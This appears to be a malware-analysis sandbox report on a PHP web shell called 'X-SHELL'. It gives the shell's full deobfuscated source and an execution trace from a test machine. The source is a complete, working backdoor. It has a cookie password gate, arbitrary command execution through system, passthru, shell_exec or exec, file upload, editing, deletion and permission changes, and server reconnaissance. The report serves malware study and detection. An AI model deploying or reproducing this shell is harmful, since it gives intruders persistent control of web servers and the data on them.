x.php

md5: 48c024b498b86674e3340be03f21e3f5

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Deobfuscated, Original, Traces)
getcwd (Deobfuscated, Original, Traces)
php_uname (Deobfuscated, Original, Traces)
phpinfo (Deobfuscated, HTML, Original)

Execution
exec (Deobfuscated, Original)
passthru (Deobfuscated, Original)
shell_exec (Deobfuscated, Original)
system (Deobfuscated, Original)

Files
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Title
X-SHELL (HTML, Original, Traces)

URLs
https://dhen-bhocil.my.id (Deobfuscated, Original)
https://dhenbhocil.my.id (Deobfuscated, Original)

Deobfuscated PHP code
<?php

error_reporting(0);
$xyn = 'tunafeesh';
if (isset($_POST['pass'])) {
    if ($_POST['pass'] == $password) {
        setcookie($xyn, $_POST['pass'], time() + 3600);
    }
    let_him_in();
}
if (!empty($password) && !isset($_COOKIE[$xyn]) or $_COOKIE[$xyn] != $password) {
    initiate();
    die;
}
$me = basename("/var/www/html/x.php.1fac61fcc4514e0ddaa33fa5f080c529.bin");
$server_soft = $_SERVER["SERVER_SOFTWARE"];
$uname = php_uname();
$cur_user = get_current_user() . ' uid:' . getmyuid() . ' gid:' . getmygid();
$safe_mode = ini_get('safe_mode');
$safe_mode = $safe_mode ? '<font color:crimson>ON</font>' : '<font color=#ccff00>OFF</font>';
$cwd = getcwd();
$bckC = '#333333';
$txtC = '#999999';
$start = "<html><head><title>X-SHELL</title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:sans-serif,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:sans-serif,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:#333333;box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:#333333;border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:#333333;border-radius:10px;border:1px solid #999999;color:#999999;text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:#999999;box-shadow:0px 0px 1px #999999;border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid #999999;padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:#333333;color:#999999;box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type=\"text/javascript\">function get_inf() {if(document.getElementById('moreI').style.display==\"block\"){document.getElementById('moreI').style.display=\"none\"}else {document.getElementById('moreI').style.display=\"block\";}} function xyn(id1,id2) {document.getElementById(id1).style.display=\"block\";document.getElementById(id2).style.display=\"none\";}</script></head><body><h1 id=\"n\"><a href=\"?x=x\"></a></h1>";
$menu = '<center><p id="menu"><span id="menuB"><<a href="' . $me . '">Home</a>> <<a href="?x=cmd&d="' . realpath('.') . '">Command</a>> <<a href="?x=php&d="' . realpath('.') . '">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>';
$end = '</body></html>';
$inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> ' . $server_soft . '  |||  <b><i><u>Uname:</u></i></b> ' . $uname . ' |||</br>||| <b><i><u>User:</u></i></b> ' . $cur_user . ' ||| <b><i><u>Safe Mode:</u></i></b> ' . $safe_mode . ' ||| <b><i><u>Directory: </i></b></u>' . $cwd . ' |||</p></center><hr>';
print "<html><head><title>X-SHELL</title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:sans-serif,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:sans-serif,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:#333333;box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:#333333;border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:#333333;border-radius:10px;border:1px solid #999999;color:#999999;text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:#999999;box-shadow:0px 0px 1px #999999;border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid #999999;padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:#333333;color:#999999;box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type=\"text/javascript\">function get_inf() {if(document.getElementById('moreI').style.display==\"block\"){document.getElementById('moreI').style.display=\"none\"}else {document.getElementById('moreI').style.display=\"block\";}} function xyn(id1,id2) {document.getElementById(id1).style.display=\"block\";document.getElementById(id2).style.display=\"none\";}</script></head><body><h1 id=\"n\"><a href=\"?x=x\"></a></h1>";
print $menu;
print $inf;
$moreI = array('PHP Version' => phpversion(), 'Zend Version' => zend_version(), 'Magic Quotes' => magic_quotes(), 'Curl' => curl(), 'Register Globals' => reg_globals(), 'OpenBase Dir' => openbase_dir(), 'MySQL' => myql(), 'Gzip' => gzip(), 'MsSQL' => mssql(), 'PostgreSQL' => postgresql(), 'Oracle' => oracle(), 'Total Space' => h_size(disk_total_space('/')), 'Used Space' => h_size(disk_free_space('/')), 'Your IP' => $_SERVER['REMOTE_ADDR'], 'Server IP' => $_SERVER['SERVER_ADDR']);
print "<table id=\"moreI\">";
foreach ($moreI as $n => $v) {
    print '<td>' . $n . '</td><td> :> </td><td> ' . $v . '</td><tr>';
}
print "<td colspan=3 align=\"center\"><a href=\"?x=phpinf\" target=\"_blank\">PHPInfo</a></td></table>";
if (isset($_GET['d'])) {
    chdir($_GET['d']);
}
if (isset($_REQUEST['x'])) {
    print '<p id="bck"><a href="?d=' . realpath('.') . '">BACK</a></p>';
    switch ($_REQUEST['x']) {
        case 'c':
            if (isset($_POST['edit_form'])) {
                $f = $_GET['f'];
                $e = fopen($f, 'w') or print "<p id=\"nn\">Error Opening File</p>";
                fwrite($e, $_POST['edit_form']) or print "<p id=\"nn\">Couldn't Save File</p>";
                fclose($e);
            }
            print '<center><p>Editing ' . $_GET['f'] . ' (' . perms($_GET['d'] . $_GET['f']) . ') .</p></br></br><form action="?x=c&d=' . realpath('.') . '&f=' . $_GET['f'] . '" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">';
            if (file_exists($_GET['f'])) {
                $c = file($_GET['f']);
                foreach ($c as $l) {
                    print htmlspecialchars($l);
                }
            }
            print "</textarea></br></br><input type=\"submit\" value=\"Save\" id=\"sv\"></form></center>";
            break;
        case 'cmd':
            print '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d=' . realpath('.') . '" method="POST"><input type="text" value="" name="cmd" id="lt">  <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
            if (isset($_POST['cmd'])) {
                $cmd = $_POST['cmd'];
                execute(exec_meth(), $cmd);
            }
            print "</textarea></center>";
            break;
        case 'php':
            print '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="' . realpath('.') . '" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
            print "</textarea></center>";
            break;
        case 'phpinf':
            phpinfo();
            break;
        case 'q':
            setcookie($xyn, '', time() - 3600);
            let_him_in();
            break;
        case 'x':
            print "</br></br></br><center><h1 id=\"nm\"></h1><h3>Contacts: <a href=\"mailto:>COM\"></a></h3><h3>Blog: <a href=\"https://dhenbhocil.my.id\" target=\"_blank\"></a></h3><h3>Tools: <a href=\"https://dhen-bhocil.my.id\" target=\"_blank\">X0MB13</a></h3></center>";
            break;
    }
} else {
    if (isset($_GET['d'])) {
        chdir($_GET['d']);
    }
    if (isset($_GET['ndir'])) {
        $d = $_GET['d'];
        $n = $_GET['ndir'];
        mkdir($d . DIRECTORY_SEPARATOR . $n);
    }
    if (isset($_POST['new'])) {
        $n = $_POST['new'];
        $o = $_POST['old'];
        $d = $_POST['d'];
        rename($d . DIRECTORY_SEPARATOR . $o, $d . DIRECTORY_SEPARATOR . $n);
    }
    if (isset($_GET['deld'])) {
        $d = $_GET['deld'];
        rmdir($d);
    }
    if (isset($_GET['delf'])) {
        $d = $_GET['delf'];
        unlink($d);
    }
    if (isset($_GET['ch'])) {
        $ch = $_GET['ch'];
        $d = $_GET['df'];
        chmod($d, $ch);
    }
    if (isset($_FILES['upfile']['name'])) {
        $d = realpath('.') . DIRECTORY_SEPARATOR . basename($_FILES['upfile']['name']);
        move_uploaded_file($_FILES['upfile']['tmp_name'], $d);
    }
    print '<p align="center" id="cp">' . curpath('') . '</p>';
    print '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d=' . realpath('.') . '" method="GET">Create Dir: <input type="hidden" name="d" value="' . realpath('.') . '" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="' . realpath('.') . '" method="GET">Create File: <input type="hidden" value="' . realpath('.') . '" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=' . realpath('.') . '" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=' . realpath('.') . '" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>';
    print "</br>";
    $filex = array();
    $dirx = array();
    print "<table width=\"75%\" align=\"center\" id=\"ft\" ><td id=\"fh\"><b>Name</b></td><td id=\"fh\" align=\"center\"><b>Permissions</b></td><td id=\"fh\" align=\"center\"><b>Owner</b></td><td id=\"fh\" align=\"center\"><b>Options</b></td><tr id=\"fn\">";
    if ($handle = opendir('.')) {
        while (false !== ($file = readdir($handle))) {
            if (is_dir($file)) {
                $dirx[] .= $file;
            } else {
                $filex[] .= $file;
            }
        }
        asort($filex);
        asort($dirx);
        $i = 0;
        foreach ($dirx as $file) {
            if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
                $own = posix_getpwuid(fileowner($file));
                $grp = posix_getgrgid(filegroup($file));
            } else {
                $own['name'] = '???';
                $grp['name'] = '???';
            }
            print '<td id="fc"><span id="n' . $file . '"><a href="?d=' . realpath($file) . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" value="' . $file . '" id="lt" name="new"><input type="hidden" value="' . $file . '" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td>';
            if ($i == 0 or $i == 1) {
                print "<td id=\"fc\"></td><tr id=\"fn\">";
            } else {
                print '<td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\')">[D]</a></td><tr id="fn">';
            }
            $i++;
        }
        foreach ($filex as $file) {
            if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
                $own = posix_getpwuid(fileowner($file));
                $grp = posix_getgrgid(filegroup($file));
            } else {
                $own['name'] = '???';
                $grp['name'] = '???';
            }
            print '<td id="fc"><span id="n' . $file . '"><a href="?x=c&d=' . realpath('.') . '&f=' . $file . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" id="lt" value="' . $file . '" name="new"><input type="hidden" value="' . $file . '" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td><td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\');">[D]</a></td><tr id="fn">';
        }
    }
    print "</table></br></br></br>";
}
function openbase_dir()
{
    $x = ini_get('open_basedir');
    if (!$x) {
        $o = '<font color=#ccff00>OFF</font>';
    } else {
        $o = '<font color=crimson>ON</font>';
    }
    return $o;
}
function magic_quotes()
{
    $x = get_magic_quotes_gpc();
    if (empty($x)) {
        $m = '<font color=#ccff00>OFF</font>';
    } else {
        $m = '<font color=crimson>ON</font>';
    }
    return $m;
}
function curl()
{
    if (extension_loaded('curl')) {
        $c = '<font color=crimson>ON</font>';
    } else {
        $c = '<font color=#ccff00>OFF</font>';
    }
    return $c;
}
function reg_globals()
{
    if (ini_get('reqister_globals')) {
        $r = '<font color=crimson>ON</font>';
    } else {
        $r = '<font color=#ccff00>OFF</font>';
    }
    return $r;
}
function oracle()
{
    if (function_exists('ocilogon')) {
        $o = '<font color=crimson>ON</font>';
    } else {
        $o = '<font color=#ccff00>OFF</font>';
    }
    return $o;
}
function postgresql()
{
    if (function_exists('pg_connect')) {
        $p = '<font color=crimson>ON</font>';
    } else {
        $p = '<font color=#ccff00>OFF</font>';
    }
    return $p;
}
function myql()
{
    if (function_exists('mysql_connect')) {
        $m = '<font color=crimson>ON</font>';
    } else {
        $m = '<font color=#ccff00>OFF</font>';
    }
    return $m;
}
function mssql()
{
    if (function_exists('mssql_connect')) {
        $m = '<font color=crimson>ON</font>';
    } else {
        $m = '<font color=#ccff00>OFF</font>';
    }
    return $m;
}
function gzip()
{
    if (function_exists('gzencode')) {
        $m = '<font color=crimson>ON</font>';
    } else {
        $m = '<font color=#ccff00>OFF</font>';
    }
    return $m;
}
function h_size($s)
{
    if ($s >= 1073741824) {
        $s = round($s / 1073741824 * 100) / 100 . 'GB';
    } elseif ($s >= 1048576) {
        $s = round($s / 1048576 * 100) / 100 . 'MB';
    } elseif ($s >= 1024) {
        $s = round($s / 1024 * 100) / 100 . 'KB';
    } else {
        $s .= 'B';
    }
    return $s;
}
function curpath($d)
{
    if ($d == '') {
        $d = getcwd();
    }
    $p = '';
    $n = '';
    $dx = explode(DIRECTORY_SEPARATOR, $d);
    for ($i = 0; $i < count($dx); $i++) {
        $g = $dx[$i];
        $p .= $dx[$i] . DIRECTORY_SEPARATOR;
        $n .= '<a href="?d=' . $p . '">' . $g . '</a>' . DIRECTORY_SEPARATOR;
    }
    return $n;
}
function get_color($f)
{
    if (is_writable($f)) {
        $c = '#ccff00';
    }
    if (!is_writable($f) && is_readable($f)) {
        $c = '' . $txtC . '';
    }
    if (!is_writable($f) && !is_readable($f)) {
        $c = 'crimson';
    }
    return $c;
}
function perms($f)
{
    if (file_exists($f)) {
        return substr(sprintf('%o', fileperms($f)), -4);
    } else {
        return "???";
    }
}
function exec_meth()
{
    if (function_exists('passthru')) {
        $m = 'passthru';
    }
    if (function_exists('exec')) {
        $m = 'exec';
    }
    if (function_exists('shell_exec')) {
        $m = 'shell_exec';
    }
    if (function_exists('system')) {
        $m = 'system';
    }
    if (!isset($m)) {
        $m = 'Disabled';
    }
    return $m;
}
function execute($m, $c)
{
    if ($m == 'passthru') {
        passthru($c);
    } elseif ($m == 'system') {
        system($c);
    } elseif ($m == 'shell_exec') {
        print shell_exec($c);
    } elseif ($m == 'exec') {
        exec($c, $r);
        foreach ($r as $o) {
            print $o . '</br>';
        }
    } else {
        print "dafuq?";
    }
}
function initiate()
{
    print '<table border=0 width=100% height=100% align=center style="background:#333333;color:silver;"><td valign="middle"><center><form action="' . basename("/var/www/html/x.php.1fac61fcc4514e0ddaa33fa5f080c529.bin") . '" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;"></form></center></td></table>';
}
function let_him_in()
{
    header("Location: " . basename("/var/www/html/x.php.1fac61fcc4514e0ddaa33fa5f080c529.bin"));
}
print $end;
Execution traces
data/traces/48c024b498b86674e3340be03f21e3f5_trace-1676257686.5499.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:08:32.447750]
1	0	1	0.000177	393464
1	3	0	0.000666	487480	{main}	1		/var/www/html/uploads/x.php	0	0
2	4	0	0.000683	487480	error_reporting	0		/var/www/html/uploads/x.php	2	1	0
2	4	1	0.000698	487520
2	4	R			22527
1		A						/var/www/html/uploads/x.php	3	$xyn = 'tunafeesh'
2	5	0	0.000729	487480	basename	0		/var/www/html/uploads/x.php	6	1	'/var/www/html/uploads/x.php'
2	5	1	0.000744	487544
2	5	R			'x.php'
1		A						/var/www/html/uploads/x.php	6	$me = 'x.php'
1		A						/var/www/html/uploads/x.php	6	$server_soft = 'Apache/2.4.52 (Ubuntu)'
2	6	0	0.000779	487512	php_uname	0		/var/www/html/uploads/x.php	6	0
2	6	1	0.000792	487624
2	6	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/x.php	6	$uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	7	0	0.000826	487624	get_current_user	0		/var/www/html/uploads/x.php	6	0
2	7	1	0.000860	487664
2	7	R			'osboxes'
2	8	0	0.000874	487672	getmyuid	0		/var/www/html/uploads/x.php	6	0
2	8	1	0.000886	487672
2	8	R			1000
2	9	0	0.000899	487680	getmygid	0		/var/www/html/uploads/x.php	6	0
2	9	1	0.000910	487680
2	9	R			1000
1		A						/var/www/html/uploads/x.php	6	$cur_user = 'osboxes uid:1000 gid:1000'
2	10	0	0.000933	487688	ini_get	0		/var/www/html/uploads/x.php	6	1	'safe_mode'
2	10	1	0.000946	487720
2	10	R			FALSE
1		A						/var/www/html/uploads/x.php	6	$safe_mode = FALSE
1		A						/var/www/html/uploads/x.php	6	$safe_mode = '<font color=#ccff00>OFF</font>'
2	11	0	0.000982	487688	getcwd	0		/var/www/html/uploads/x.php	6	0
2	11	1	0.000994	487736
2	11	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/x.php	6	$cwd = '/var/www/html/uploads'
1		A						/var/www/html/uploads/x.php	6	$bckC = '#333333'
1		A						/var/www/html/uploads/x.php	6	$txtC = '#999999'
1		A						/var/www/html/uploads/x.php	7	$start = '<html><head><title>X-SHELL</title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:sans-serif,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:sans-serif,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13p'
2	12	0	0.001066	489896	realpath	0		/var/www/html/uploads/x.php	8	1	'.'
2	12	1	0.001079	489976
2	12	R			'/var/www/html/uploads'
2	13	0	0.001093	489976	realpath	0		/var/www/html/uploads/x.php	8	1	'.'
2	13	1	0.001106	490056
2	13	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/x.php	8	$menu = '<center><p id="menu"><span id="menuB"><<a href="x.php">Home</a>> <<a href="?x=cmd&d="/var/www/html/uploads">Command</a>> <<a href="?x=php&d="/var/www/html/uploads">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>'
1		A						/var/www/html/uploads/x.php	8	$end = '</body></html>'
1		A						/var/www/html/uploads/x.php	8	$inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu)  |||  <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||</br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color=#ccff00>OFF</font> ||| <b><i><u>Directory: </i></b></u>/var/www/html/uploads |||</p></center><hr>'
2	14	0	0.001182	490552	phpversion	0		/var/www/html/uploads/x.php	10	0
2	14	1	0.001194	490616
2	14	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	15	0	0.001209	491312	zend_version	0		/var/www/html/uploads/x.php	10	0
2	15	1	0.001221	491344
2	15	R			'3.2.0'
2	16	0	0.001234	491344	magic_quotes	1		/var/www/html/uploads/x.php	10	0
3	17	0	0.001245	491344	get_magic_quotes_gpc	0		/var/www/html/uploads/x.php	46	0
3	17	1	0.001257	491344
3	17	R			FALSE
2		A						/var/www/html/uploads/x.php	46	$x = FALSE
2		A						/var/www/html/uploads/x.php	46	$m = '<font color=#ccff00>OFF</font>'
2	16	1	0.001291	491344
2	16	R			'<font color=#ccff00>OFF</font>'
2	18	0	0.001306	491344	curl	1		/var/www/html/uploads/x.php	10	0
3	19	0	0.001317	491344	extension_loaded	0		/var/www/html/uploads/x.php	47	1	'curl'
3	19	1	0.001330	491384
3	19	R			TRUE
2		A						/var/www/html/uploads/x.php	47	$c = '<font color=crimson>ON</font>'
2	18	1	0.001353	491344
2	18	R			'<font color=crimson>ON</font>'
2	20	0	0.001374	491344	reg_globals	1		/var/www/html/uploads/x.php	10	0
3	21	0	0.001386	491344	ini_get	0		/var/www/html/uploads/x.php	48	1	'reqister_globals'
3	21	1	0.001399	491376
3	21	R			FALSE
2		A						/var/www/html/uploads/x.php	48	$r = '<font color=#ccff00>OFF</font>'
2	20	1	0.001422	491344
2	20	R			'<font color=#ccff00>OFF</font>'
2	22	0	0.001437	491344	openbase_dir	1		/var/www/html/uploads/x.php	10	0
3	23	0	0.001448	491344	ini_get	0		/var/www/html/uploads/x.php	45	1	'open_basedir'
3	23	1	0.001461	491376
3	23	R			''
2		A						/var/www/html/uploads/x.php	45	$x = ''
2		A						/var/www/html/uploads/x.php	45	$o = '<font color=#ccff00>OFF</font>'
2	22	1	0.001493	491344
2	22	R			'<font color=#ccff00>OFF</font>'
2	24	0	0.001507	491344	myql	1		/var/www/html/uploads/x.php	10	0
3	25	0	0.001518	491344	function_exists	0		/var/www/html/uploads/x.php	51	1	'mysql_connect'
3	25	1	0.001531	491384
3	25	R			FALSE
2		A						/var/www/html/uploads/x.php	51	$m = '<font color=#ccff00>OFF</font>'
2	24	1	0.001554	491344
2	24	R			'<font color=#ccff00>OFF</font>'
2	26	0	0.001568	491344	gzip	1		/var/www/html/uploads/x.php	10	0
3	27	0	0.001579	491344	function_exists	0		/var/www/html/uploads/x.php	53	1	'gzencode'
3	27	1	0.001592	491384
3	27	R			TRUE
2		A						/var/www/html/uploads/x.php	53	$m = '<font color=crimson>ON</font>'
2	26	1	0.001615	491344
2	26	R			'<font color=crimson>ON</font>'
2	28	0	0.001629	491344	mssql	1		/var/www/html/uploads/x.php	10	0
3	29	0	0.001640	491344	function_exists	0		/var/www/html/uploads/x.php	52	1	'mssql_connect'
3	29	1	0.001652	491384
3	29	R			FALSE
2		A						/var/www/html/uploads/x.php	52	$m = '<font color=#ccff00>OFF</font>'
2	28	1	0.001675	491344
2	28	R			'<font color=#ccff00>OFF</font>'
2	30	0	0.001690	491344	postgresql	1		/var/www/html/uploads/x.php	10	0
3	31	0	0.001701	491344	function_exists	0		/var/www/html/uploads/x.php	50	1	'pg_connect'
3	31	1	0.001713	491384
3	31	R			FALSE
2		A						/var/www/html/uploads/x.php	50	$p = '<font color=#ccff00>OFF</font>'
2	30	1	0.001736	491344
2	30	R			'<font color=#ccff00>OFF</font>'
2	32	0	0.001750	491344	oracle	1		/var/www/html/uploads/x.php	10	0
3	33	0	0.001761	491344	function_exists	0		/var/www/html/uploads/x.php	49	1	'ocilogon'
3	33	1	0.001773	491384
3	33	R			FALSE
2		A						/var/www/html/uploads/x.php	49	$o = '<font color=#ccff00>OFF</font>'
2	32	1	0.001796	491344
2	32	R			'<font color=#ccff00>OFF</font>'
2	34	0	0.001810	491344	disk_total_space	0		/var/www/html/uploads/x.php	10	1	'/'
2	34	1	0.001825	491376
2	34	R			232015802368
2	35	0	0.001839	491344	h_size	1		/var/www/html/uploads/x.php	10	1	232015802368
3	36	0	0.001852	491344	round	0		/var/www/html/uploads/x.php	54	1	21608.155441284
3	36	1	0.001865	491376
3	36	R			21608
2		A						/var/www/html/uploads/x.php	54	$s = '216.08GB'
2	35	1	0.001889	491384
2	35	R			'216.08GB'
2	37	0	0.001902	491384	disk_free_space	0		/var/www/html/uploads/x.php	10	1	'/'
2	37	1	0.001916	491416
2	37	R			196797628416
2	38	0	0.001929	491384	h_size	1		/var/www/html/uploads/x.php	10	1	196797628416
3	39	0	0.001941	491384	round	0		/var/www/html/uploads/x.php	54	1	18328.207397461
3	39	1	0.001953	491416
3	39	R			18328
2		A						/var/www/html/uploads/x.php	54	$s = '183.28GB'
2	38	1	0.001977	491424
2	38	R			'183.28GB'
1		A						/var/www/html/uploads/x.php	10	$moreI = ['PHP Version' => '7.2.34-37+ubuntu22.04.1+deb.sury.org+1', 'Zend Version' => '3.2.0', 'Magic Quotes' => '<font color=#ccff00>OFF</font>', 'Curl' => '<font color=crimson>ON</font>', 'Register Globals' => '<font color=#ccff00>OFF</font>', 'OpenBase Dir' => '<font color=#ccff00>OFF</font>', 'MySQL' => '<font color=#ccff00>OFF</font>', 'Gzip' => '<font color=crimson>ON</font>', 'MsSQL' => '<font color=#ccff00>OFF</font>', 'PostgreSQL' => '<font color=#ccff00>OFF</font>', 'Oracle' => '<font color=#ccff00>OFF</font>', 'Total Space' => '216.08GB', 'Used Space' => '183.28GB', 'Your IP' => '127.0.0.1', 'Server IP' => '127.0.0.1']
1		A						/var/www/html/uploads/x.php	10	$n = 'PHP Version'
1		A						/var/www/html/uploads/x.php	10	$n = 'Zend Version'
1		A						/var/www/html/uploads/x.php	10	$n = 'Magic Quotes'
1		A						/var/www/html/uploads/x.php	10	$n = 'Curl'
1		A						/var/www/html/uploads/x.php	10	$n = 'Register Globals'
1		A						/var/www/html/uploads/x.php	10	$n = 'OpenBase Dir'
1		A						/var/www/html/uploads/x.php	10	$n = 'MySQL'
1		A						/var/www/html/uploads/x.php	10	$n = 'Gzip'
1		A						/var/www/html/uploads/x.php	10	$n = 'MsSQL'
1		A						/var/www/html/uploads/x.php	10	$n = 'PostgreSQL'
1		A						/var/www/html/uploads/x.php	10	$n = 'Oracle'
1		A						/var/www/html/uploads/x.php	10	$n = 'Total Space'
1		A						/var/www/html/uploads/x.php	10	$n = 'Used Space'
1		A						/var/www/html/uploads/x.php	10	$n = 'Your IP'
1		A						/var/www/html/uploads/x.php	10	$n = 'Server IP'
2	40	0	0.002179	491424	curpath	1		/var/www/html/uploads/x.php	34	1	''
3	41	0	0.002191	491424	getcwd	0		/var/www/html/uploads/x.php	55	0
3	41	1	0.002203	491472
3	41	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/x.php	55	$d = '/var/www/html/uploads'
